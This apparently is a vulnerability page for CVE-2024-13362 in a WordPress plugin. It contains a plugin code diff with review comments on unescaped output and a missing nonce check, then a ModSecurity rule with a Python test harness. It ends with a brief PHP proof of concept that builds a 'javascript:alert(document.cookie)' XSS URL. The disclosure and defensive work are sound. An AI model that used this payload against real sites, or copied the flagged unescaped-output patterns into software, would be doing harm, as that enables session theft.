       // Font awesome 4 and 5 loader
-      if ( apply_filters( 'csf_fa4', false ) ) {
-        wp_enqueue_style( 'csf-fa', 'https://cdn.jsdelivr.net/npm/font-awesome@4.7.0/css/font-awesome.min.css', array(), '4.7.0', 'all' );
+      if (apply_filters('csf_fa4', false)) {
+        wp_enqueue_style('csf-fa', 'https://cdn.jsdelivr.net/npm/font-awesome@4.7.0/css/font-awesome.min.css', array(), '4.7.0', 'all');
       } else {
-        wp_enqueue_style( 'csf-fa5', 'https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css', array(), '5.15.5', 'all' );
-        wp_enqueue_style( 'csf-fa5-v4-shims', 'https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/v4-shims.min.css', array(), '5.15.5', 'all' );
+        wp_enqueue_style('csf-fa5', 'https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css', array(), '5.15.5', 'all');
+        wp_enqueue_style('csf-fa5-v4-shims', 'https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/v4-shims.min.css', array(), '5.15.5', 'all');
       }

       // Check for developer mode
-      $min = ( self::$premium && SCRIPT_DEBUG ) ? '' : '.min';
+      $min = (self::$premium && SCRIPT_DEBUG) ? '' : '.min';

       // Main style
-      wp_enqueue_style( 'csf', self::include_plugin_url( 'assets/css/style'. $min .'.css' ), array(), self::$version, 'all' );
+      wp_enqueue_style('csf', self::include_plugin_url('assets/css/style' . $min . '.css'), array(), self::$version, 'all');

       // Main RTL styles
-      if ( is_rtl() ) {
-        wp_enqueue_style( 'csf-rtl', self::include_plugin_url( 'assets/css/style-rtl'. $min .'.css' ), array(), self::$version, 'all' );
+      if (is_rtl()) {
+        wp_enqueue_style('csf-rtl', self::include_plugin_url('assets/css/style-rtl' . $min . '.css'), array(), self::$version, 'all');
       }

       // Main scripts
-      wp_enqueue_script( 'csf-plugins', self::include_plugin_url( 'assets/js/plugins'. $min .'.js' ), array(), self::$version, true );
-      wp_enqueue_script( 'csf', self::include_plugin_url( 'assets/js/main'. $min .'.js' ), array( 'csf-plugins' ), self::$version, true );
+      wp_enqueue_script('csf-plugins', self::include_plugin_url('assets/js/plugins' . $min . '.js'), array(), self::$version, true);
+      wp_enqueue_script('csf', self::include_plugin_url('assets/js/main' . $min . '.js'), array('csf-plugins'), self::$version, true);

       // Main variables
-      wp_localize_script( 'csf', 'csf_vars', array(
-        'color_palette'     => apply_filters( 'csf_color_palette', array() ),
+      wp_localize_script('csf', 'csf_vars', array(
+        'color_palette'     => apply_filters('csf_color_palette', array()),
         'i18n'              => array(
-          'confirm'         => esc_html__( 'Are you sure?', 'csf' ),
-          'typing_text'     => esc_html__( 'Please enter %s or more characters', 'csf' ),
-          'searching_text'  => esc_html__( 'Searching...', 'csf' ),
-          'no_results_text' => esc_html__( 'No results found.', 'csf' ),
+          'confirm'         => esc_html__('Are you sure?', 'csf'),
+          'typing_text'     => esc_html__('Please enter %s or more characters', 'csf'),
+          'searching_text'  => esc_html__('Searching...', 'csf'),
+          'no_results_text' => esc_html__('No results found.', 'csf'),
         ),
-      ) );
+      ));

       // Enqueue fields scripts and styles
       $enqueued = array();

-      if ( ! empty( self::$fields ) ) {
-        foreach ( self::$fields as $field ) {
-          if ( ! empty( $field['type'] ) ) {
+      if (! empty(self::$fields)) {
+        foreach (self::$fields as $field) {
+          if (! empty($field['type'])) {
             $classname = 'CSF_Field_' . $field['type'];
-            if ( class_exists( $classname ) && method_exists( $classname, 'enqueue' ) ) {
-              $instance = new $classname( $field );
-              if ( method_exists( $classname, 'enqueue' ) ) {
+            if (class_exists($classname) && method_exists($classname, 'enqueue')) {
+              $instance = new $classname($field);
+              if (method_exists($classname, 'enqueue')) {
                 $instance->enqueue();
               }
-              unset( $instance );
+              unset($instance);
             }
           }
         }
       }

-      do_action( 'csf_enqueue' );
-
+      do_action('csf_enqueue');
     }

     // Add typography enqueue styles to front page
-    public static function add_typography_enqueue_styles() {
+    public static function add_typography_enqueue_styles()
+    {

-      if ( ! empty( self::$webfonts ) ) {
+      if (! empty(self::$webfonts)) {

-        if ( ! empty( self::$webfonts['enqueue'] ) ) {
+        if (! empty(self::$webfonts['enqueue'])) {

           $query = array();
           $fonts = array();

-          foreach ( self::$webfonts['enqueue'] as $family => $styles ) {
-            $fonts[] = $family . ( ( ! empty( $styles ) ) ? ':'. implode( ',', $styles ) : '' );
+          foreach (self::$webfonts['enqueue'] as $family => $styles) {
+            $fonts[] = $family . ((! empty($styles)) ? ':' . implode(',', $styles) : '');
           }

-          if ( ! empty( $fonts ) ) {
-            $query['family'] = implode( '%7C', $fonts );
+          if (! empty($fonts)) {
+            $query['family'] = implode('%7C', $fonts);
           }

-          if ( ! empty( self::$subsets ) ) {
-            $query['subset'] = implode( ',', self::$subsets );
+          if (! empty(self::$subsets)) {
+            $query['subset'] = implode(',', self::$subsets);
           }

           $query['display'] = 'swap';

-          wp_enqueue_style( 'csf-google-web-fonts', esc_url( add_query_arg( $query, '//fonts.googleapis.com/css' ) ), array(), null );
-
+          wp_enqueue_style('csf-google-web-fonts', esc_url(add_query_arg($query, '//fonts.googleapis.com/css')), array(), null);
         }

-        if ( ! empty( self::$webfonts['async'] ) ) {
+        if (! empty(self::$webfonts['async'])) {

           $fonts = array();

-          foreach ( self::$webfonts['async'] as $family => $styles ) {
-            $fonts[] = $family . ( ( ! empty( $styles ) ) ? ':'. implode( ',', $styles ) : '' );
+          foreach (self::$webfonts['async'] as $family => $styles) {
+            $fonts[] = $family . ((! empty($styles)) ? ':' . implode(',', $styles) : '');
           }

-          wp_enqueue_script( 'csf-google-web-fonts', esc_url( '//ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js' ), array(), null );
-
-          wp_localize_script( 'csf-google-web-fonts', 'WebFontConfig', array( 'google' => array( 'families' => $fonts ) ) );
+          wp_enqueue_script('csf-google-web-fonts', esc_url('//ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js'), array(), null);

+          wp_localize_script('csf-google-web-fonts', 'WebFontConfig', array('google' => array('families' => $fonts)));
         }
-
       }
-
     }

     // Add admin body class
-    public static function add_admin_body_class( $classes ) {
+    public static function add_admin_body_class($classes)
+    {

-      if ( apply_filters( 'csf_fa4', false ) ) {
+      if (apply_filters('csf_fa4', false)) {
         $classes .= 'csf-fa5-shims';
       }

       return $classes;
-
     }

     // Add custom css to front page
-    public static function add_custom_css() {
+    public static function add_custom_css()
+    {

-      if ( ! empty( self::$css ) ) {
-        echo '<style type="text/css">'. wp_strip_all_tags( self::$css ) .'</style>';
+      if (! empty(self::$css)) {
+        echo '<style type="text/css">' . wp_strip_all_tags(self::$css) . '</style>';
       }
-
     }

     // Add a new framework field
-    public static function field( $field = array(), $value = '', $unique = '', $where = '', $parent = '' ) {
+    public static function field($field = array(), $value = '', $unique = '', $where = '', $parent = '')
+    {

       // Check for unallow fields
-      if ( ! empty( $field['_notice'] ) ) {
+      if (! empty($field['_notice'])) {

         $field_type = $field['type'];

         $field            = array();
-        $field['content'] = esc_html__( 'Oops! Not allowed.', 'csf' ) .' <strong>('. $field_type .')</strong>';
+        $field['content'] = esc_html__('Oops! Not allowed.', 'csf') . ' <strong>(' . $field_type . ')</strong>';
         $field['type']    = 'notice';
         $field['style']   = 'danger';
-
       }

       $depend     = '';
       $visible    = '';
-      $unique     = ( ! empty( $unique ) ) ? $unique : '';
-      $class      = ( ! empty( $field['class'] ) ) ? ' ' . esc_attr( $field['class'] ) : '';
-      $is_pseudo  = ( ! empty( $field['pseudo'] ) ) ? ' csf-pseudo-field' : '';
-      $field_type = ( ! empty( $field['type'] ) ) ? esc_attr( $field['type'] ) : '';
+      $unique     = (! empty($unique)) ? $unique : '';
+      $class      = (! empty($field['class'])) ? ' ' . esc_attr($field['class']) : '';
+      $is_pseudo  = (! empty($field['pseudo'])) ? ' csf-pseudo-field' : '';
+      $field_type = (! empty($field['type'])) ? esc_attr($field['type']) : '';

-      if ( ! empty( $field['dependency'] ) ) {
+      if (! empty($field['dependency'])) {

         $dependency      = $field['dependency'];
         $depend_visible  = '';
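Review bot: in the `_notice` branch of `field()`, `$field_type` is read straight from `$field['type']` and concatenated into `$field['content']` between `<strong>(` and `)</strong>` with no escaping, while the same key is passed through `esc_attr()` a few lines further down. Wrap it as `esc_html( $field_type )` in this branch rather than relying on the notice renderer. Separately, `add_admin_body_class()` appends `'csf-fa5-shims'` without a leading space, so it fuses with whatever class is already at the end of `$classes`.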
@@ -729,70 +726,65 @@
         $data_value      = '';
         $data_global     = '';

-        if ( is_array( $dependency[0] ) ) {
-          $data_controller = implode( '|', array_column( $dependency, 0 ) );
-          $data_condition  = implode( '|', array_column( $dependency, 1 ) );
-          $data_value      = implode( '|', array_column( $dependency, 2 ) );
-          $data_global     = implode( '|', array_column( $dependency, 3 ) );
-          $depend_visible  = implode( '|', array_column( $dependency, 4 ) );
+        if (is_array($dependency[0])) {
+          $data_controller = implode('|', array_column($dependency, 0));
+          $data_condition  = implode('|', array_column($dependency, 1));
+          $data_value      = implode('|', array_column($dependency, 2));
+          $data_global     = implode('|', array_column($dependency, 3));
+          $depend_visible  = implode('|', array_column($dependency, 4));
         } else {
-          $data_controller = ( ! empty( $dependency[0] ) ) ? $dependency[0] : '';
-          $data_condition  = ( ! empty( $dependency[1] ) ) ? $dependency[1] : '';
-          $data_value      = ( ! empty( $dependency[2] ) ) ? $dependency[2] : '';
-          $data_global     = ( ! empty( $dependency[3] ) ) ? $dependency[3] : '';
-          $depend_visible  = ( ! empty( $dependency[4] ) ) ? $dependency[4] : '';
+          $data_controller = (! empty($dependency[0])) ? $dependency[0] : '';
+          $data_condition  = (! empty($dependency[1])) ? $dependency[1] : '';
+          $data_value      = (! empty($dependency[2])) ? $dependency[2] : '';
+          $data_global     = (! empty($dependency[3])) ? $dependency[3] : '';
+          $depend_visible  = (! empty($dependency[4])) ? $dependency[4] : '';
         }

-        $depend .= ' data-controller="'. esc_attr( $data_controller ) .'"';
-        $depend .= ' data-condition="'. esc_attr( $data_condition ) .'"';
-        $depend .= ' data-value="'. esc_attr( $data_value ) .'"';
-        $depend .= ( ! empty( $data_global ) ) ? ' data-depend-global="true"' : '';
-
-        $visible = ( ! empty( $depend_visible ) ) ? ' csf-depend-visible' : ' csf-depend-hidden';
+        $depend .= ' data-controller="' . esc_attr($data_controller) . '"';
+        $depend .= ' data-condition="' . esc_attr($data_condition) . '"';
+        $depend .= ' data-value="' . esc_attr($data_value) . '"';
+        $depend .= (! empty($data_global)) ? ' data-depend-global="true"' : '';

+        $visible = (! empty($depend_visible)) ? ' csf-depend-visible' : ' csf-depend-hidden';
       }

       // These attributes has been sanitized above.
-      echo '<div class="csf-field csf-field-'. $field_type . $is_pseudo . $class . $visible .'"'. $depend .'>';
+      echo '<div class="csf-field csf-field-' . $field_type . $is_pseudo . $class . $visible . '"' . $depend . '>';

-      if ( ! empty( $field_type ) ) {
+      if (! empty($field_type)) {

-        if ( ! empty( $field['title'] ) ) {
+        if (! empty($field['title'])) {
           echo '<div class="csf-title">';
-          echo '<h4>'. $field['title'] .'</h4>';
-          echo ( ! empty( $field['subtitle'] ) ) ? '<div class="csf-subtitle-text">'. $field['subtitle'] .'</div>' : '';
+          echo '<h4>' . $field['title'] . '</h4>';
+          echo (! empty($field['subtitle'])) ? '<div class="csf-subtitle-text">' . $field['subtitle'] . '</div>' : '';
           echo '</div>';
         }

-        echo ( ! empty( $field['title'] ) ) ? '<div class="csf-fieldset">' : '';
+        echo (! empty($field['title'])) ? '<div class="csf-fieldset">' : '';

-        $value = ( ! isset( $value ) && isset( $field['default'] ) ) ? $field['default'] : $value;
-        $value = ( isset( $field['value'] ) ) ? $field['value'] : $value;
+        $value = (! isset($value) && isset($field['default'])) ? $field['default'] : $value;
+        $value = (isset($field['value'])) ? $field['value'] : $value;

-        $classname = 'CSF_Field_'. $field_type;
+        $classname = 'CSF_Field_' . $field_type;

-        if ( class_exists( $classname ) ) {
-          $instance = new $classname( $field, $value, $unique, $where, $parent );
+        if (class_exists($classname)) {
+          $instance = new $classname($field, $value, $unique, $where, $parent);
           $instance->render();
         } else {
-          echo '<p>'. esc_html__( 'Field not found!', 'csf' ) .'</p>';
+          echo '<p>' . esc_html__('Field not found!', 'csf') . '</p>';
         }
-
       } else {
-        echo '<p>'. esc_html__( 'Field not found!', 'csf' ) .'</p>';
+        echo '<p>' . esc_html__('Field not found!', 'csf') . '</p>';
       }

-      echo ( ! empty( $field['title'] ) ) ? '</div>' : '';
+      echo (! empty($field['title'])) ? '</div>' : '';
       echo '<div class="clear"></div>';
       echo '</div>';
-
     }
-
   }
-
 }

-CSF_Setup::init( __FILE__, true );
+CSF_Setup::init(__FILE__, true);

 /**
  *
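Review bot: the comment "These attributes has been sanitized above" covers only the attributes on the wrapper `<div>`; two lines later `$field['title']` and `$field['subtitle']` are still echoed raw into `<h4>` and `csf-subtitle-text`, and this hunk only respaces them. If field definitions can carry untrusted text, run both through `wp_kses_post()` at output, or add a comment stating that titles are developer-supplied HTML by contract.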
@@ -802,6 +794,6 @@
  * @version 1.0.0
  *
  */
-if ( ! class_exists( 'CSF' ) ) {
-  class CSF extends CSF_Setup{}
+if (! class_exists('CSF')) {
+  class CSF extends CSF_Setup {}
 }
--- a/html5-audio-player/admin/global/free-plugin-list.php
+++ b/html5-audio-player/admin/global/free-plugin-list.php
@@ -1,201 +0,0 @@
-<?php
-require_once ABSPATH . "wp-admin/includes/plugin-install.php";
-
-function h5ap_free_plugin_loaded(){
-    wp_enqueue_script('plugin-install');
-    wp_enqueue_script('updates');
-}
-add_action('init', 'h5ap_free_plugin_loaded');
-//$table->display();
-if (!class_exists('H5AP_BPlugins_Free_plugins')) {
-    class H5AP_BPlugins_Free_plugins
-    {
-
-        public function __construct()
-        {
-            add_action('admin_menu', array($this, 'bplugins_free_plugins_menu'));
-        }
-        public function bplugins_free_plugins_menu()
-        {
-            add_submenu_page(
-                'edit.php?post_type=videoplayer',
-                'Our Free Plugins',
-                'Our Free Plugins',
-                'manage_options',
-                'free-plugins-from-bplugins',
-                array($this, 'bplugin_free_plugin_list')
-            );
-        }
-
-        public function bplugin_free_plugin_list()
-        {
-            $fields = array(
-                'active_installs' => true, // rounded int
-                'added' => false, // date
-                'author' => true, // a href html
-                'author_block_count' => false, // int
-                'author_block_rating' => false, // int
-                'author_profile' => false, // url
-                'banners' => false, // array( [low], [high] )
-                'compatibility' => true, // empty array?
-                'contributors' => false, // array( array( [profile], [avatar], [display_name] )
-                'description' => false, // string
-                'donate_link' => false, // url
-                'download_link' => true, // url
-                'downloaded' => true, // int
-                // 'group' => false,                 // n/a
-                'homepage' => false, // url
-                'icons' => true, // array( [1x] url, [2x] url )
-                'last_updated' => true, // datetime
-                'name' => true, // string
-                'num_ratings' => true, // int
-                'rating' => true, // int
-                'ratings' => true, // array( [5..0] )
-                'requires' => true, // version string
-                'requires_php' => true, // version string
-                // 'reviews' => false,               // n/a, part of 'sections'
-                'screenshots' => false, // array( array( [src],  ) )
-                'sections' => true, // array( [description], [installation], [changelog], [reviews], ...)
-                'short_description' => true, // string
-                'slug' => true, // string
-                'support_threads' => false, // int
-                'support_threads_resolved' => false, // int
-                'tags' => false, // array( )
-                'tested' => false, // version string
-                'version' => true, // version string
-                'versions' => true, // array( [version] url )
-            );
-            $plugins = plugins_api('query_plugins', array(
-                'author' => 'abuhayat',
-                'per_page' => 30,
-                //'fields' => $fields,
-            ));
-            ?>
-
-<div class="bplgins_free_plugins">
-    <div class="wp-filter" style="text-align: center;">
-        <h1 style="padding:10px;">Free PLugnis From bPLugins</h1>
-    </div>
-    <form id="plugin-filter" method="post">
-        <div class="wp-list-table widefat plugin-install">
-            <h2 class='screen-reader-text'>Plugins list</h2>
-            <div id="the-list">
-                <?php foreach ($plugins->plugins as $plugin):
-
-                $title = $plugin['name'];
-                $version = $plugin['version'];
-                $name = strip_tags($title . ' ' . $version);
-                $details_link = self_admin_url("plugin-install.php?tab=plugin-information&plugin=" . $plugin["slug"] .
-                    "&TB_iframe=true&width=753&height=852");
-                $status = install_plugin_install_status($plugin);
-                $requires_php = isset($plugin->requires_php) ? $plugin->requires_php : null;
-                $requires_wp = isset($plugin->requires) ? $plugin->requires : null;
-
-                $compatible_php = is_php_version_compatible($requires_php);
-                $compatible_wp = is_wp_version_compatible($requires_wp);
-                $action_links = array();
-                if (current_user_can("install_plugins") || current_user_can("update_plugins")) {
-                    $status = install_plugin_install_status($plugin);
-                    switch ($status['status']) {
-                        case 'install':
-                            if ($status['url']) {
-                                if ($compatible_php && $compatible_wp) {
-                                    // $action_links[] = '<a onClick="disableClick()" data-slug="' . esc_attr($plugin['slug']) . '" id="plugin_install_from_iframe" class="button button-primary right" href="' . esc_attr($plugin['slug']) . '" target="_parent">' . __('Install Now') . '</a>';
-                                    $action_links[] = '<a class="install-now button" data-slug="' . esc_attr($plugin['slug']) . '" href="' . esc_attr($status['url']) . '" aria-label="Install ' . esc_attr($name) . ' now" data-name="' . esc_attr($name) . '">Install Now</a>';
-                                } else {
-                                    $action_links[] = '<button type="button" class="button button-primary button-disabled right" disabled="disabled">Cannot Install</button>';
-                                }
-                            }
-                            break;
-                        case 'update_available':
-                            if ($status['url']) {
-                                if ($compatible_php) {
-                                    //$action_links[] = '<a data-slug="' . esc_attr($plugin['slug']) . '" data-plugin="' . esc_attr($status['file']) . '" id="plugin_update_from_iframe" class="button button-primary right" href="' . $status['url'] . '" target="_parent">' . __('Install Update') . '</a>';
-                                    $action_links[] = '<a class="update-now button aria-button-if-js" data-plugin="' . esc_attr($status['file']) . '" data-slug="' . esc_attr($plugin['slug']) . '" href="' . $status['url'] . '" aria-label="Update PDF Poster – PDF Embedder Plugin for WordPress 1.6.3 now" data-name="' . esc_attr($plugin['name']) . '" role="button">Update Now</a>';
-                                } else {
-
-                                    $action_links[] = '<button type="button" class="button button-primary button-disabled right" disabled="disabled">Cannot Update</button>';
-
-                                }
-                            }
-                            break;
-                        case 'newer_installed':
-                            /* translators: %s: Plugin version. */
-                            $action_links[] = '<a class="button button-primary right disabled">' . sprintf(__('Newer Version (%s) Installed'), $status['version']) . '</a>';
-                            break;
-                        case 'latest_installed':
-                            $action_links[] = '<a class="button button-primary right disabled">' . __('Installed') . '</a>';
-                            break;
-                    }
-                }
-                $action_links[] = '<a href="' . esc_url($details_link) . '" class="thickbox" aria-label="' . esc_attr(sprintf("More information about %s", $plugin['name'])) . '" data-title="' . esc_attr($plugin['name']) . '">' . __('More Details') . '</a>';
-
-                ?>
-
-																					                <div class="plugin-card plugin-card-<?php echo $plugin['slug']; ?>">
-																					                    <div class="plugin-card-top">
-																					                        <div class="name column-name">
-																					                            <h3>
-																					                                <a href="<?php echo $details_link; ?>" class="thickbox open-plugin-details-modal">
-																					                                    <?php echo $plugin['name']; ?> <img src="<?php echo $plugin['icons']['1x'] ?>"
-																					                                        class="plugin-icon" alt="">
-																					                                </a>
-																					                            </h3>
-																					                        </div>
-																					                        <div class="action-links">
-																					                            <ul class="plugin-action-buttons">
-																					                                <li><?php if ($action_links) {
-                    echo implode("</li><li>", $action_links);
-                }
-                ?></li>
-																					                            </ul>
-																					                        </div>
-																					                        <div class="desc column-description">
-																					                            <p><?php echo $plugin['short_description']; ?></p>
-																					                            <p class="authors"> <cite>By <?php echo $plugin['author'] ?></cite>
-																					                            </p>
-																					                        </div>
-																					                    </div>
-																					                    <div class="plugin-card-bottom">
-																					                        <div class="vers column-rating">
-																					                            <?php wp_star_rating(array("rating" => $plugin["rating"], "type" => "percent", "number" => $plugin["num_ratings"]));?>
-																					                            <span class="num-ratings">
-																					                                (<?php echo number_format_i18n($plugin["num_ratings"]); ?>)
-																					                            </span>
-																					                        </div>
-																					                        <div class="column-updated">
-																					                            <strong><?php _e("Last Updated:");?></strong>
-																					                            <span title="<?php echo esc_attr($plugin["last_updated"]); ?>">
-																					                                <?php printf("%s ago", human_time_diff(strtotime($plugin["last_updated"])));?>
-																					                            </span>
-																					                        </div>
-																					                        <div class="column-updated">
-																					                            <?php echo sprintf(_n("%s download", "%s downloads", $plugin["downloaded"]), number_format_i18n($plugin["downloaded"])); ?>
-																					                        </div>
-																					                        <div class="column-downloaded">
-																					                            <?php //echo $plugin['active_installs'] . '+ Active Installations'; ?> </div>
-																					                        <div class="column-compatibility">
-																					                            <?php
-    if (!empty($plugin["tested"]) && version_compare(substr($GLOBALS["wp_version"], 0, strlen($plugin["tested"])), $plugin["tested"], ">")) {
-                    echo '<span class="compatibility-untested">' . __("<strong>Untested</strong> with your version of WordPress") . '</span>';
-                } elseif (!empty($plugin["requires"]) && version_compare(substr($GLOBALS["wp_version"], 0, strlen($plugin["requires"])), $plugin["requires"], "<")) {
-                echo '<span class="compatibility-incompatible">' . __("Incompatible with your version of WordPress") . '</span>';
-            } else {
-                echo '<span class="compatibility-compatible">' . __("Compatible with your version of WordPress") . '</span>';
-            }
-            ?>
-                        </div>
-                    </div>
-                </div>
-                <?php endforeach;?>
-
-            </div>
-        </div>
-    </form>
-</div>
-<?php
-
-        }
-    }
-}
-new H5AP_BPlugins_Free_plugins();
 No newline at end of file
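Review bot: nothing in this hunk shows the include that loaded admin/global/free-plugin-list.php being removed, so confirm it is dropped in the same change; a leftover `require_once` of a deleted file is a fatal error at admin load. If the listing is being moved rather than dropped, note that the removed template echoed `$plugin['slug']`, `$plugin['name']`, `$plugin['short_description']`, `$plugin['author']` and `$plugin['icons']['1x']` from the `plugins_api()` response without escaping, and its replacement should not carry that over.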
--- a/html5-audio-player/admin/global/help-usages.php
+++ b/html5-audio-player/admin/global/help-usages.php
@@ -1,84 +0,0 @@
-<?php
-
-/*-------------------------------------------------------------------------------*/
-// Developer page
-/*-------------------------------------------------------------------------------*/
-add_action('admin_menu', 'h5ap_support_page');
-
-function h5ap_support_page()
-{
-    add_submenu_page('edit.php?post_type=audioplayer', 'Help', 'Help', 'manage_options', 'h5ap-support', 'h5ap_support_page_callback');
-}
-
-function h5ap_support_page_callback(){
-    ?>
-    <div class="bplugins-container">
-        <div class="row">
-            <div class="bplugins-features">
-                <div class="col col-12">
-                    <div class="bplugins-feature center">
-                        <h1><?php _e("Help & Usages", "h5ap"); ?></h1>
-                    </div>
-                </div>
-            </div>
-        </div>
-    </div>
-<div class="bplugins-container">
-    <div class="row">
-        <div class="bplugins-features">
-            <div class="col col-4">
-                <div class="bplugins-feature center">
-                    <i class="fa fa-life-ring"></i>
-                    <h3><?php _e('Need any Assistance?', 'h5ap'); ?></h3>
-                    <p><?php _e('Our Expert Support Team is always ready to help you out promptly.', 'h5ap'); ?></p>
-                    <a href="https://bplugins.com/support/" target="_blank" class="button
-                    button-primary"><?php _e('Contact Support', 'h5ap') ?></a>
-                </div>
-            </div>
-            <div class="col col-4">
-                <div class="bplugins-feature center">
-                    <i class="fa fa-file-text"></i>
-                    <h3><?php _e('Looking for Documentation?', 'h5ap') ?></h3>
-                    <p><?php echo _e("We have detailed documentation on every aspects of HTML5 Audio Player.", "h5ap") ?></p>
-                    <a href="https://audioplayerwp.com/docs/" target="_blank" class="button button-primary"><?php _e("Documentation", "h5ap") ?></a>
-                </div>
-            </div>
-            <div class="col col-4">
-                <div class="bplugins-feature center">
-                    <i class="fa fa-thumbs-up"></i>
-                    <h3><?php _e("Like This Plugin?", "h5ap"); ?></h3>
-                    <p><?php _e("If you like HTML5 Audio Player, please leave us a 5 ⭐ rating.", "h5ap") ?></p>
-                    <a href="https://wordpress.org/support/plugin/html5-audio-player/reviews/#new-post" target="_blank" class="button
-                    button-primary"><?php _e("Rate the Plugin", "h5ap"); ?></a>
-                </div>
-            </div>
-        </div>
-    </div>
-</div>
-<div class="bplugins-container">
-    <div class="row">
-        <div class="bplugins-features">
-            <div class="col col-12">
-                <div class="bplugins-feature center" style="padding:5px;">
-                    <h2 style="font-size:22px;"><?php _e("Looking For Demo?", "h5ap"); ?> <a href="https://audioplayerwp.com/" target="_blank"><?php _e("Click Here", "h5ap"); ?></a></h2>
-                </div>
-            </div>
-        </div>
-    </div>
-</div>
-<div class="bplugins-container">
-    <div class="row">
-        <div class="bplugins-features">
-            <div class="col col-12">
-                <div class="bplugins-feature center">
-                    <h1><?php _e("Video Tutorials", "h5ap"); ?></h1><br/>
-                    <div class="embed-container"><iframe width="100%" height="700px" src="https://www.youtube.com/embed/MbY9oyERJck" frameborder="0"
-                    allowfullscreen></iframe></div>
-                </div>
-            </div>
-        </div>
-    </div>
-</div>
-
-<?php
-}
 No newline at end of file
--- a/html5-audio-player/admin/inc/import-meta.php
+++ b/html5-audio-player/admin/inc/import-meta.php
@@ -1,252 +0,0 @@
-<?php
-
- function h5ap_import_data_ajax(){
-    h5ap_import_data();
-    h5ap_import_settings();
-    echo wp_json_encode(array(
-        'success' => true,
-    ));
-    die();
-}
-add_action("wp_ajax_h5ap_import_data", 'h5ap_import_data_ajax');
-
-function h5ap_import_data(){
-    $players = new WP_Query(array(
-        'post_type' => 'audioplayer',
-        'post_status' => 'any',
-        'posts_per_page' => -1
-    ));
-
-    while ($players->have_posts()): $players->the_post();
-
-     
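Review bot: `h5ap_import_data_ajax()` at the top of this removed file is hooked to `wp_ajax_h5ap_import_data` and, in the visible lines, calls `h5ap_import_data()` and `h5ap_import_settings()` with no `check_ajax_referer()` and no `current_user_can()` in front of them. If the import is being relocated rather than dropped, the replacement handler needs both a nonce check and a capability check before it does any work.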

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2024-13362
# Blocks reflected XSS via the 'url' parameter in the CSF welcome page
# Targets the specific vulnerable endpoint and parameter
# REQUEST_FILENAME is the path without the query string; REQUEST_URI includes the
# query string, so "@streq" against it never matches a request carrying ?page=...

SecRule REQUEST_FILENAME "@streq /wp-admin/admin.php" \
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 - Reflected XSS via url parameter in Freemius welcome page',severity:'CRITICAL',tag:'CVE-2024-13362'"
  SecRule ARGS:page "@streq csf-welcome" "chain"
    SecRule ARGS:url "@rx (?:javascript|data|vbscript):" "t:none,t:lowercase"
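
The chained rule above, re-expressed as an added Python check (not Atomic Edge's code) so that its three conditions can be run offline against constructed request targets. It assumes the path is compared without its query string and the url value is lowercased before the pattern is applied; `rule_denies`, `SAMPLES` and `evaluate` are names invented for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scheme pattern taken from the rule's last link; matched against a lowercased value.
SCHEME_RX = re.compile(r"(?:javascript|data|vbscript):")


def rule_denies(request_target):
    """Return True when all three chained conditions match, i.e. the WAF answers 403."""
    parts = urlsplit(request_target)
    # Link 1: compare the path alone; the query string is left to the ARGS links.
    if parts.path != "/wp-admin/admin.php":
        return False
    # parse_qs percent-decodes names and values, as the WAF does when it fills ARGS.
    args = parse_qs(parts.query, keep_blank_values=True)
    # Link 2: the page argument must select the welcome view.
    if "csf-welcome" not in args.get("page", []):
        return False
    # Link 3: unanchored search, so the scheme name may sit anywhere in the value.
    return any(SCHEME_RX.search(value.lower()) for value in args.get("url", []))


# Constructed request targets (not captured traffic). The first is the example
# URL quoted in the analysis text; the rest probe the edges of the rule's scope.
SAMPLES = {
    "page_example": "/wp-admin/admin.php?page=csf-welcome&url=javascript:alert(document.cookie)",
    "encoded_mixed_case": "/wp-admin/admin.php?page=csf-welcome&url=JavaScript%3Aalert(1)",
    "benign_https": "/wp-admin/admin.php?page=csf-welcome&url=https%3A%2F%2Fexample.org%2Fdocs",
    "other_page": "/wp-admin/admin.php?page=other-page&url=javascript:alert(1)",
    "other_script": "/wp-admin/index.php?page=csf-welcome&url=javascript:alert(1)",
    "false_positive": "/wp-admin/admin.php?page=csf-welcome&url=https%3A%2F%2Fexample.org%2Fmetadata%3Av2",
}


def evaluate(samples=SAMPLES):
    """Map each sample name to the rule's verdict (True = denied)."""
    return {name: rule_denies(target) for name, target in samples.items()}


if __name__ == "__main__":
    for name, denied in evaluate().items():
        print(f"{'DENY ' if denied else 'ALLOW'} {name}")
```

The last sample shows that the unanchored pattern also denies an ordinary https URL whose path contains `data:`, a false positive to weigh before deploying the rule in blocking mode.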

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
```php
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

$target_url = 'http://example.com'; // Change this to the target WordPress admin URL
$admin_page = '/wp-admin/admin.php?page=csf-welcome';
$payload = 'javascript:alert(document.cookie)';

// Construct the malicious URL
$attack_url = $target_url . $admin_page . '&url=' . urlencode($payload);

